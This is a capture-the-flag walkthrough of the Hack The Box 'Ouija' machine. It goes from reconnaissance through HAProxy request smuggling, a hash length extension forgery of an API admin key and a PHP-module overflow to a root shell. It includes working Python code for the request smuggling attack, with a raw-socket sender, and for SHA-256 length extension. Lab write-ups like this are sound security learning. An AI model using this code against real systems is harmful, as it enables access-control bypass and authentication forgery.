In this post, I would like to share a walkthrough of the Ouija machine from Hack The Box.

This room is rated as an Insane machine on Hack The Box.

What will you gain from the Ouija machine?

For the user flag, you must abuse an HTTP request smuggling vulnerability in HAProxy to reach a development site that HAProxy is intended to block. This access exposes information about the API, enough to perform a hash length extension attack and obtain a valid admin key for the API. With this key, I can abuse the API to read files from the system, including an SSH private key, thereby gaining an initial foothold.

As for the root flag, you need to exploit a custom PHP module, written in C and compiled into a .so file, that contains an integer overflow vulnerability. The overflow allows variables on the stack to be overwritten, which gives an arbitrary write as root on the system.

Information Gathering on Ouija Machine

Once the VPN connection is up (the configuration file is downloaded from Hack The Box), we can start with an Nmap scan:

┌─[darknite@parrot]─[~/Documents/htb/ouija]
└──╼ $nmap -sV -sC 10.10.11.244 -oA initial 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-17 21:44 EDT
Nmap scan report for 10.10.11.244
Host is up (0.26s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 6ff2b4ed1a918d6ec9105171d57c49bb (ECDSA)
|_  256 dfddbcdc570d98af0f882f73334862e8 (ED25519)
80/tcp   open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.71 seconds
┌─[darknite@parrot]─[~/Documents/htb/ouija]
└──╼ $

Let’s access the website interface.

It shows the Apache2 default page when we access the website.

After analysing the Nmap output, I noticed another open port, 3000, which runs the Node.js Express framework.

As a result, we will enumerate further using gobuster, since the website interface itself gives us very little information.

There’s a server-status page exposing Apache’s status information (mod_status) on the machine.

While looking at server-status, the list of requests being processed caught my attention, as it reveals some potential directories that we can investigate later.

Access the website using the domain name

Let’s access the website using a domain name such as ouija.htb, which shows the actual interface of the web application.

At least we have found a potential username when looking at the Team section.

Let’s send one message and look at the response packet.

Sadly, there is nothing that looks interesting in the response.

Let’s try to enumerate further on the service that port 3000 exposes to the public, but gobuster gives an error when doing so.

As a result, let’s append the --wildcard switch to the end of the actual gobuster command.

There are a few endpoints that look interesting, so let’s try them on the website.

When accessing the endpoint that caught my attention, it required a few pieces of data to be entered.

Enumerate possible subdomains on the Ouija machine

However, there is nothing of interest to investigate there.

Let’s change the wordlist to find more results.

There is one subdomain that caught my attention.

We get a 403 Forbidden error when trying to access dev.ouija.htb.

The subdomain gitea.ouija.htb takes us to a Gitea main page.

I noticed there’s one repository that we can look into, belonging to Leila.

Nothing suspicious appears in the repo itself.

While scrolling down, I noticed it references HA-Proxy version 2.2.16, which looked new to me.

For those who are not sure about the vulnerability in HA-Proxy version 2.2.16, the information below should make it understandable.

Apache internally listens on port 8080, and the HAProxy reverse proxy in front of it, version 2.2.16 according to the repository, is vulnerable to HTTP request smuggling (GHSA-h2p2-w857-329f / CVE-2023-25725). The bug is that HAProxy’s HTTP/1 header parser accepts an empty header field name, which truncates the parsed header list: every header after it is lost, so a Content-Length placed after the empty header is never seen by HAProxy’s access rules while the body it frames still reaches Apache.

A direct request to dev.ouija.htb doesn’t work, as shown above, so let’s work around the block with that vulnerability.

By using the vulnerability, I found two files that we can investigate further.

Let’s analyze the source code, which we can use to proceed with the next stage.

We can look into /proc/self/environ, which exposes a potential username (Leila).

Sadly, we cannot retrieve /etc/passwd at the moment.

After correcting the Content-Length so that it matches the exact byte length of the smuggled request, it works like a charm!
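The smuggling request described above, as an added example that is not part of the original post: it builds the CVE-2023-25725 wrapper (an empty header field name followed by the Content-Length that HAProxy then fails to see), models the parser behaviour so the framing can be checked offline, and includes a raw-socket sender. The hostnames are the ones from the post; the request paths, the model of HAProxy’s parsing and the sender are assumptions and simplifications, not HAProxy’s code and not the exact request used in the post.

```python
import socket

# Hostnames are the ones from the post; the paths used below are placeholders
# (assumption: the post does not print the exact requests it sent).
FRONT_HOST = "ouija.htb"        # Host HAProxy lets through
TARGET_HOST = "dev.ouija.htb"   # Host HAProxy answers with 403


def build_inner_request(host: str, path: str) -> bytes:
    """The request we want Apache (the backend) to answer, bypassing HAProxy."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"   # make the backend close after answering
        "\r\n"
    ).encode()


def build_smuggled_request(front_host: str, inner: bytes, path: str = "/",
                           content_length: int = -1) -> bytes:
    """CVE-2023-25725 wrapper. The empty header field name (the ':' line) makes
    HAProxy 2.2.16 truncate its parsed header list, so the Content-Length after
    it is invisible to HAProxy's ACLs. Content-Length must equal the exact byte
    length of `inner`; the parameter exists only to demonstrate a wrong value."""
    if content_length < 0:
        content_length = len(inner)
    outer = (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {front_host}\r\n"
        ":\r\n"
        f"Content-Length: {content_length}\r\n"
        "\r\n"
    ).encode()
    return outer + inner


def vulnerable_proxy_view(raw: bytes) -> bytes:
    """Model (not HAProxy's code) of the 2.2.16 behaviour: headers after an
    empty field name are dropped from what is forwarded, but the Content-Length
    value was already parsed, so exactly that many body bytes are passed on to
    the backend. Bytes beyond it would be parsed by HAProxy as a new request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    kept, body_len, truncated = [lines[0]], 0, False
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if not name.strip():
            truncated = True
            continue
        if name.strip().lower() == b"content-length":
            body_len = int(value.strip())
        if not truncated:
            kept.append(line)
    return b"\r\n".join(kept) + b"\r\n\r\n" + body[:body_len]


def backend_split(stream: bytes) -> list:
    """Split the forwarded bytes into requests as a Content-Length-honouring
    backend would: the first request carries no Content-Length any more, so the
    smuggled bytes right behind it become a second, unfiltered request."""
    requests = []
    while stream:
        head, sep, rest = stream.partition(b"\r\n\r\n")
        if not sep:
            break  # incomplete request: the backend keeps waiting for more bytes
        length = 0
        for line in head.split(b"\r\n")[1:]:
            name, _, value = line.partition(b":")
            if name.strip().lower() == b"content-length":
                length = int(value.strip())
        requests.append(head + sep + rest[:length])
        stream = rest[length:]
    return requests


def send_raw(ip: str, port: int, payload: bytes, timeout: float = 5.0) -> bytes:
    """Send the raw bytes to the HAProxy front end and read until it closes, so
    any response to the smuggled request that HAProxy relays is captured too."""
    with socket.create_connection((ip, port), timeout=timeout) as s:
        s.sendall(payload)
        chunks = []
        while True:
            try:
                data = s.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    inner = build_inner_request(TARGET_HOST, "/")
    payload = build_smuggled_request(FRONT_HOST, inner)
    seen = backend_split(vulnerable_proxy_view(payload))
    print(f"backend would see {len(seen)} requests; the second targets {TARGET_HOST}")
    # Against the box: print(send_raw("10.10.11.244", 80, payload).decode(errors="replace"))
```

The check that matters in practice is the one modelled by `vulnerable_proxy_view`: if the Content-Length is smaller than the smuggled request, the backend receives a truncated second request and never answers it; if it is larger, HAProxy waits for body bytes that never arrive. Burp Suite's "Update Content-Length" option will not compute this value for you, because the length must cover the inner request only.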

Let’s do some research on the hash length extension attack, which can be read about here.

Another resource that can be used here to escalate further.

Let’s generate the ihash and identification values using hash_extender, which can be downloaded here.

Let’s obtain the user’s SSH private key and copy-paste it onto our machine.

We can also obtain the user flag using the method above.

Finally, we have successfully accessed the machine via Leila’s account.

We can read the user flag by typing the “cat user.txt” command.
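The attack hash_extender performs, written out as an added example that is neither the post’s own code nor hash_extender’s: a pure-Python SHA-256 whose compression function can be resumed from a published digest. The post does not say which hash the API uses or how the key is built; this example assumes an ihash of the form SHA256(secret || identification) with "leila" as the leaked identification value, so the scheme, the secret and the appended data are all assumptions.

```python
import hashlib
import struct

# SHA-256 round constants (FIPS 180-4).
K = [
    0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,
    0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,
    0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,
    0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,
    0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,
    0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,
    0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,
    0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2,
]
MASK = 0xFFFFFFFF


def _rotr(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK


def _compress(state, block):
    """One SHA-256 compression over a 64-byte block, starting from `state`."""
    w = list(struct.unpack(">16I", block)) + [0] * 48
    for i in range(16, 64):
        s0 = _rotr(w[i - 15], 7) ^ _rotr(w[i - 15], 18) ^ (w[i - 15] >> 3)
        s1 = _rotr(w[i - 2], 17) ^ _rotr(w[i - 2], 19) ^ (w[i - 2] >> 10)
        w[i] = (w[i - 16] + s0 + w[i - 7] + s1) & MASK
    a, b, c, d, e, f, g, h = state
    for i in range(64):
        t1 = (h + (_rotr(e, 6) ^ _rotr(e, 11) ^ _rotr(e, 25))
              + ((e & f) ^ (~e & g)) + K[i] + w[i]) & MASK
        t2 = ((_rotr(a, 2) ^ _rotr(a, 13) ^ _rotr(a, 22))
              + ((a & b) ^ (a & c) ^ (b & c))) & MASK
        h, g, f, e, d, c, b, a = g, f, e, (d + t1) & MASK, c, b, a, (t1 + t2) & MASK
    return [(s + v) & MASK for s, v in zip(state, (a, b, c, d, e, f, g, h))]


def md_padding(total_len: int) -> bytes:
    """The padding SHA-256 appends to a message of total_len bytes."""
    return b"\x80" + b"\x00" * ((55 - total_len) % 64) + struct.pack(">Q", total_len * 8)


def length_extend(known_hex: str, key_len: int, message: bytes, append: bytes):
    """Given H = SHA256(key || message) and a guess for len(key), forge
    H' = SHA256(key || message || glue || append) without knowing the key.
    Returns (message || glue || append, H' as hex)."""
    # The published digest is the internal state after hashing key||message||glue,
    # so compression is simply resumed from it.
    state = list(struct.unpack(">8I", bytes.fromhex(known_hex)))
    glue = md_padding(key_len + len(message))
    consumed = key_len + len(message) + len(glue)       # already a multiple of 64
    tail = append + md_padding(consumed + len(append))  # length field covers everything
    for off in range(0, len(tail), 64):
        state = _compress(state, tail[off:off + 64])
    return message + glue + append, struct.pack(">8I", *state).hex()


def candidates(known_hex: str, message: bytes, append: bytes, max_key_len: int = 64):
    """Secret length unknown: one forgery per candidate length, to be tried in turn."""
    return [(n,) + length_extend(known_hex, n, message, append) for n in range(1, max_key_len + 1)]


def issue_ihash(secret: bytes, identification: bytes) -> str:
    """Model of the assumed API: ihash = SHA256(secret || identification)."""
    return hashlib.sha256(secret + identification).hexdigest()


def server_check(secret: bytes, identification: bytes, ihash_hex: str) -> bool:
    """Model of the assumed API check on a presented (identification, ihash) pair."""
    return issue_ihash(secret, identification) == ihash_hex


if __name__ == "__main__":
    secret = b"unknown-to-attacker"          # constructed; the attacker never sees it
    leaked_id, leaked_ihash = b"leila", issue_ihash(secret, b"leila")
    new_id, new_ihash = length_extend(leaked_ihash, len(secret), leaked_id, b"admin")
    print(new_id.hex(), new_ihash, server_check(secret, new_id, new_ihash))
```

The forged identification contains the glue bytes (0x80 and NULs), so it has to be sent in whatever encoding the API uses for binary values (hex, URL-encoding or similar); hash_extender prints it in that form for the same reason. When the secret length is not known, `candidates` produces one pair per length and each is submitted until the server accepts one.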

Escalate to Root Privileges Access

As usual, we can try sudo -l to list the binaries we may run, but it fails because Leila’s password is required.

Let’s look at the ports that are listening on the machine; there is one port that looks unusual.

Therefore, let’s set up port forwarding to reach it from our machine.

It looks like a normal login page.

As a result, let’s try common credentials such as admin:admin.

Sadly, nothing interesting shows up in the response.

There’s one directory that looks different from the usual ones.

After looking at the directory, I noticed there is one file that we need to investigate further.

The screenshot above shows the source code of index.php.

There’s one file type (the compiled .so extension) that we should investigate more deeply.

Let’s download the file to our machine.

We can download it using pwncat-cs.

Let’s analyze the file using Ghidra.

We should run the command above to escalate further.

Let’s create the buffer overflow payload as shown in the screenshot above.

Then let’s send the BoF payload via Burp Suite.

The command injection works like a charm.

Finally, we managed to get the reverse shell connection back to us.

We can read the root flag by typing the “cat root.txt” command.
